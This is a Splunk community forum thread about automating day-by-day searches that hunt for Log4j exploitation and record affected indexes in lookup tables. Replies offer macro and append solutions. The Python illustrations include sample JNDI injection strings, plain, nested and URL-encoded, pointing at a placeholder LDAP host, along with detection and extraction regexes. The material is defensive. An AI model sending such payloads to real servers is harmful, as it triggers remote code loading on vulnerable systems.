Break up search over large timeframe into searches of smaller timeframes

cyberdiver
Explorer
TLDR: I'm trying to automate breaking one large 25-day search into 25 separate one-day searches.

I'm updating a lookup table that tracks which indexes are affected by the new log4j exploit, so that subsequent searches only have to scan the affected indexes.  Each update of this lookup table takes hours for a single day of data.  The problem is that I need to know every affected index across all of the days since log4j activity started, around December 10th.

Query that updates lookup table:

 

NOT [| inputlookup log4j_indexes.csv | fields index]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
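
To make it easier to see what the regex in the query above accepts, here is a minimal Python sketch that applies the same pattern to a few sample strings. The sample events and the helper name looks_like_log4j_probe are made up for illustration; Splunk's regex command uses PCRE, and this particular pattern is assumed to behave the same way in Python's re module.

```python
import re

# Pattern copied from the query above: "$" or "%24", then "{" or "%7B", then the
# letters j, n, d, i in that order with arbitrary filler allowed between them.
LOG4J_PATTERN = re.compile(
    r"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])"
    r"(:|%3A|\$|%24|}|%7D)"
)


def looks_like_log4j_probe(raw_event: str) -> bool:
    """Return True when the event text matches the obfuscation-tolerant pattern."""
    return LOG4J_PATTERN.search(raw_event) is not None


# Hypothetical sample events, not taken from real logs.
samples = [
    "GET /?q=${jndi:ldap://203.0.113.5/a}",
    "User-Agent: ${${lower:j}ndi:ldap://203.0.113.5/a}",
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D",
    "GET /index.html HTTP/1.1",
]
for event in samples:
    print(looks_like_log4j_probe(event), event)
```

The filler groups such as [^jJ]* are what let nested lookups like ${lower:j} slip through, and they are also why the pattern has to be evaluated against every raw event rather than against indexed terms.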

 

Each time this query finishes, it appends the log4j-exploit-affected indexes to the lookup table.  I need to automate the scan over a large timeframe (December 10th 2021 - January 5th 2022), and I want the lookup table to update after each day is scanned.  In other words, I want to break the large 25-day search into 25 separate one-day searches.  That way, if a search fails, I don't lose all of the progress so far.  I can then apply the same methodology to other searches.

Lookup Table (Log4J_affected_indexes)

Index
index_1
index_2

 

How I've tried to solve the problem

  • Commands I've tried while attempting to solve:
    • foreach
    • map
    • gentimes
    • subsearch
    • saved searches

Gentimes (smaller timeframes) -> map

Explanation of Query below:

The gentimes part creates a table based on the selected timerange:

Earliest              Latest
01/02/2022:00:00:00   01/03/2022:00:00:00
01/03/2022:00:00:00   01/04/2022:00:00:00
01/04/2022:00:00:00   01/05/2022:00:00:00
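
For reference, the table above is just a list of consecutive one-day (earliest, latest) pairs in the %m/%d/%Y:%H:%M:%S format that Splunk's earliest and latest time modifiers accept. A minimal Python sketch of the same slicing, assuming naive timestamps with no time zone handling (the function name daily_windows is hypothetical):

```python
from datetime import datetime, timedelta

# Same timestamp layout the queries in this post build with strftime.
SPLUNK_TIME_FORMAT = "%m/%d/%Y:%H:%M:%S"


def daily_windows(start: datetime, end: datetime):
    """Yield (earliest, latest) strings for each one-day slice of [start, end)."""
    cursor = start
    while cursor < end:
        # Clamp the last slice so it never runs past the requested end.
        upper = min(cursor + timedelta(days=1), end)
        yield cursor.strftime(SPLUNK_TIME_FORMAT), upper.strftime(SPLUNK_TIME_FORMAT)
        cursor = upper


for earliest, latest in daily_windows(datetime(2022, 1, 2), datetime(2022, 1, 5)):
    print(earliest, latest)
```

Each pair could then be fed to one run of the lookup-updating search, so a failure only costs the day that was in flight.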

 

I try to pass those values to a subsearch as the earliest and latest parameters using map.  I understand now that map doesn't seem to work for this, and I get no results when the search runs.

(gentimes and map) Query:

 

|gentimes start=-1
		 |addinfo
		 |eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),"%m/%d/%Y:%H:%M:%S")
		 |mvexpand datetime
		 |fields datetime
		 |eval latest=datetime
		 |eval input_earliest=strptime(datetime, "%m/%d/%Y:%H:%M:%S") - 86400
		 |eval earliest=strftime(input_earliest, "%m/%d/%Y:%H:%M:%S")
		 |fields earliest, latest
| map search="search NOT [| inputlookup log4j_indexes.csv | fields index] earliest=$earliest$ latest=$latest$
| regex _raw=\"(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)\"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv"

 

Gentimes subsearch -> main search

Explanation of Query below:

I use gentimes in a subsearch to produce smaller timeframes from the larger selected timeframe:

Earliest              Latest
01/02/2022:00:00:00   01/03/2022:00:00:00
01/03/2022:00:00:00   01/04/2022:00:00:00
01/04/2022:00:00:00   01/05/2022:00:00:00

 

This doesn't give me errors.  However, I get no matches.  I can almost guarantee this isn't running separate searches per value displayed in the above table.  I'm not sure how this can be done.

(gentimes subsearch) Query:

 

NOT [| inputlookup log4j_indexes.csv | fields index]
[|gentimes start=-1
	|addinfo
	|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"), 
         "%m/%d/%Y:%H:%M:%S")
	|mvexpand datetime
	|fields datetime
	|eval latest=datetime
	|eval input_earliest=strptime(datetime,"%m/%d/%Y:%H:%M:%S") - 86400
	|eval earliest=strftime(input_earliest,"%m/%d/%Y:%H:%M:%S")
	|fields earliest, latest]
| regex _raw="(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv

 

Conclusion

Other failed attempts:

  • using foreach (can't do non-streaming)
  • passing earliest and latest parameters to saved-search
    • savedsearch doesn't work this way

Other solutions I've thought of:

  • Running subsearch that updates a smaller_timeframe.csv file that keeps track of the smaller timeframes.  Then, pass those timeframe parameters (earliest / latest) into a search somehow.
  • Somehow run a recursive kind of search, where each search triggers the next one with its earliest and latest values moved forward by one day (or any other amount of time).
  • Maybe Splunk has a feature (not on the search head) that can repeat the same search over small timeframes across a large period of time.  Maybe this unknown-to-me feature also has scheduling built in.
If there is any other information that I can give to help others solve this with me, then just ask.  I can edit this post...

cyberdiver
Explorer

The solution to this "breaking up a large timeframe into smaller timeframes" problem uses macros.  The macro and the search are listed below:

Search Query over 7 days (split up into 7 searches)

- Each macro call updates the lookup table and only checks indexes that are not already listed in it as affected by log4j.  The search therefore speeds up as more affected indexes are found.  The next step of this process is to use the same type of macro to narrow down the affected sourcetypes.

 

NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"@d")
    | eval earliest=latest-(24*60*60)
    | eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
    | eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
    | table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]

 

 

 Lookup Table Updater Macro

 

append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
    [| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"-$day$d@d")
    | eval earliest=latest-(24*60*60)
    | eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
    | eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
    | table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]

 

  • Possible Improvements:
    • Recursive macros 
      • You could have an if statement within the macro that sort of acts like a for loop and recursively calls the next day down.
      • Example:  You are searching 7 days so put 7 as an argument to the macro.  It then checks using eval - "IF day is more than 1 then pass that same macro with current_day-1 as the day argument - ELSE pass 1".
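
Whether a macro can call itself this way is not confirmed anywhere in this thread. As a different route to the same goal of not hand-copying one line per day, here is a minimal Python sketch that generates the chain of macro calls as text, ready to paste under the base search. It runs outside Splunk, and the function name macro_chain is hypothetical; only the lookup_updater_ultra macro and its argument names come from the search above.

```python
def macro_chain(days: int, lookup_table: str, lookup_field: str, search_command: str) -> str:
    """Build one `lookup_updater_ultra(...)` call per day, joined by newlines."""
    # Escape double quotes so the command survives being passed as a quoted macro argument.
    escaped = search_command.replace('"', '\\"')
    calls = []
    for day in range(1, days + 1):
        calls.append(
            f'| `lookup_updater_ultra(lookup_table="{lookup_table}",'
            f'lookup_field="{lookup_field}",day={day},'
            f'search_command="{escaped}")`'
        )
    return "\n".join(calls)


# The regex command used in this thread, written as raw strings to keep the backslashes.
regex_command = (
    r'regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])'
    r'([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"'
)
print(macro_chain(7, "log4j_indexes.csv", "index", regex_command))
```

Changing the first argument to 25 would produce the full 25-day chain without any manual editing.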

 


ITWhisperer
SplunkTrust

You could try something like this:

NOT 
    [| inputlookup indexes.csv 
    | table index] 
    [| makeresults 
    | addinfo 
    | eval latest=relative_time(info_max_time,"@d") 
    | eval earliest=latest-(24*60*60) 
    | table earliest latest] 
| table index 
| inputlookup append=true indexes.csv 
| dedup index 
| outputlookup indexes.csv 
| where index="1" 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-1d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-2d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-3d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-4d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-5d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-6d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [ search NOT 
        [| inputlookup indexes.csv 
        | table index] 
        [| makeresults 
        | addinfo 
        | eval latest=relative_time(info_max_time,"-7d@d") 
        | eval earliest=latest-(24*60*60) 
        | table earliest latest] 
    | table index 
    | inputlookup append=true indexes.csv 
    | dedup index 
    | outputlookup indexes.csv 
    | where index="1"] 
| append 
    [| inputlookup indexes.csv]

Essentially, this goes back 8 days, one day at a time. You can modify the latest and earliest calculation to suit your requirement.
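
To see which windows the latest/earliest calculation produces, here is a minimal Python sketch that mimics relative_time(info_max_time,"-Nd@d") followed by earliest=latest-(24*60*60). It assumes naive timestamps (no time zone or daylight-saving handling), and the end time used is a made-up example; window_for_day is a hypothetical helper name.

```python
from datetime import datetime, timedelta


def window_for_day(search_latest: datetime, day: int):
    """Mimic relative_time(info_max_time, "-<day>d@d"), then earliest = latest - 86400."""
    shifted = search_latest - timedelta(days=day)  # the "-<day>d" offset
    latest = shifted.replace(hour=0, minute=0, second=0, microsecond=0)  # the "@d" snap
    earliest = latest - timedelta(seconds=24 * 60 * 60)
    return earliest, latest


# Hypothetical end of the time picker range.
search_latest = datetime(2022, 1, 5, 14, 30)
for day in range(0, 8):
    earliest, latest = window_for_day(search_latest, day)
    print(day, earliest.isoformat(), latest.isoformat())
```

Day 0 corresponds to the base search and days 1 through 7 to the appended subsearches, which gives eight back-to-back one-day windows.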

If you create a macro for the append parts, e.g. index_checker(1) with a single argument named day:

| append
    [search NOT 
    [| inputlookup indexes.csv 
        | table index]
    [| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"-$day$d@d")
    | eval earliest=latest-(24*60*60)
    | table earliest latest]
    | table index
    | inputlookup append=true indexes.csv
    | dedup index
    | outputlookup indexes.csv
    | where index="1"]

 The search can be reduced to this:

NOT 
    [| inputlookup indexes.csv 
        | table index]
    [| makeresults
    | addinfo
    | eval latest=relative_time(info_max_time,"@d")
    | eval earliest=latest-(24*60*60)
    | table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
`index_checker(1)`
`index_checker(2)`
`index_checker(3)`
`index_checker(4)`
`index_checker(5)`
`index_checker(6)`
`index_checker(7)`
| append
    [| inputlookup indexes.csv]

cyberdiver
Explorer

Does this mean that each day would run separately and in a certain order?  Do they run at the same time?  If not, which one would run first?

Also, you give me a great idea.  I might be able to nest multiple macros to solve this in a way that can be used in other cases. 😁



johnhuang
Motivator
  • There could be opportunities to use keyword/string searches, which are orders of magnitude faster.
  • Your regex could be made significantly more efficient.

Could you provide a few examples of the different iterations of the JNDI string that you are trying to match against?

cyberdiver
Explorer

There are hundreds of different iterations (it seems), judging by what that regex matches.  The bigger issue is updating the 3 lookup tables I have right now (log4j_affected_indexes.csv, log4j_affected_sourcetypes.csv, and log4j_malicious_sources.csv).  Log4J started showing up around December 10th, so I need to log every malicious source that I can, and then check whether there was outbound communication back to those sources.  This means querying ~25 days of logs and extracting the malicious sources from them.  A single 25-day search probably wouldn't go well.  Breaking it up automatically into 25 searches that each last about two hours means it would take ~3 days to run, and then I query again to look for outbound communications.

I even wrote regex to extract those malicious sources (IP or URL) from the raw data:

 

(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)(?<Exploit>.*?)((\:|%3A)*?)(\/\/|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.*?)))|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]*?)|(%24)|(%7B)|(%7D))*?[\w\d\.]+?[\.\/\:\=]*?)+))((%7D|\}){1})

 

 


johnhuang
Motivator

Simplify your searches, and reconsider whether it's necessary to find every possible iteration of the JNDI string and whether it's necessary to check every exploit attempt.

For example, this "global" search took 4 seconds to complete against a 1TB/day Splunk environment.

("${jndi" OR "%24%7Bjndi") earliest=-7d@d
| rex "(?<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))"
| eval jndi_string=urldecode(jndi_string)
| table _time index sourcetype jndi_string
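
To show what the rex and urldecode steps above pull out of an event, here is a minimal Python sketch using the same pattern. It assumes Python's urllib.parse.unquote behaves like Splunk's urldecode for these inputs, and the sample events in the usage lines are made up; extract_jndi is a hypothetical helper name.

```python
import re
from urllib.parse import unquote

# Same pattern as the rex above; Python spells named groups as (?P<name>...).
JNDI_PATTERN = re.compile(r"(?P<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))")


def extract_jndi(raw_event: str):
    """Return the URL-decoded JNDI string from an event, or None if there is none."""
    match = JNDI_PATTERN.search(raw_event)
    if match is None:
        return None
    return unquote(match.group("jndi_string"))


# Hypothetical sample events, not taken from real logs.
print(extract_jndi("GET /?q=${jndi:ldap://203.0.113.5/a} HTTP/1.1"))
print(extract_jndi("GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1"))
print(extract_jndi("User-Agent: ${${lower:j}ndi:ldap://203.0.113.5/a}"))
```

The last sample is not matched, which is the trade-off being suggested: the literal "${jndi" and "%24%7Bjndi" terms keep the search fast but skip obfuscated variants.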


If you have a next-generation firewall (NGFW), look for outbound LDAP or DNS connections.
